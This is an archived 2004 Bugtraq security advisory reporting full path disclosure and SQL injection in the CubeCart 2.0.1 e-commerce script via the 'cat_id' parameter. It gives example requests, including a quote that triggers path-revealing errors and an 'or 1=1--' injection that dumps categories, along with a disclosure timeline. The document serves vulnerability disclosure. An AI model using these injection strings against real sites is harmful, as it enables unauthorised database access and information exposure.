lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 6 Oct 2004 14:40:16 -0000
From: Pedro Sanches <pedro_sanches@...o.pt>
To: bugtraq@...urityfocus.com
Subject: Full path disclosure and sql injection on CubeCart 2.0.1




--------------------------------------------------------
Full path disclosure and sql injection on CubeCart 2.0.1
--------------------------------------------------------

[1]Introduction
[2]The Problem
[3]The Solution
[4]Timeline
[5]Feddback

##############################################################

[1]Introduction

"CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you can setup a powerful online store as long as you 

have hosting supporting PHP and one MySQL database."

This info was taken from http://www.cubecart.com

CubeCart, from Brooky (http://www.brooky.com), is a software formerly known as eStore.


[2]The Problem

A remote user can cause an error in index.php using the parameter 'cat_id' which is not properly validated, displaying the 

software's full installation path. It can also be used to inject sql commands. Examples follow:

(a)	http://example.com/store/index.php?cat_id='

	causes an error like this:
		
	"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in 				

	/home/example/public_html/store/link_navi.php on line 35

	Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in 					

	/home/example/public_html/store/index.php on line 170

	Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in 				

	/home/example/public_html/store/index.php on line 172"


(b)	http://example.com/store/index.php?cat_id=1 or 1=1--

	displays all categories in the database


[3]The Solution

None at this time. Vendor contacted and fix will be avaliable soon.


[4]Timeline

(2/10/2004) Vulnerability discovered
(2/10/2004) Vendor notified
(3/10/2004) Vendor response


[5]Feedback

Comments and stuff to cybercide@...amail.pt


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ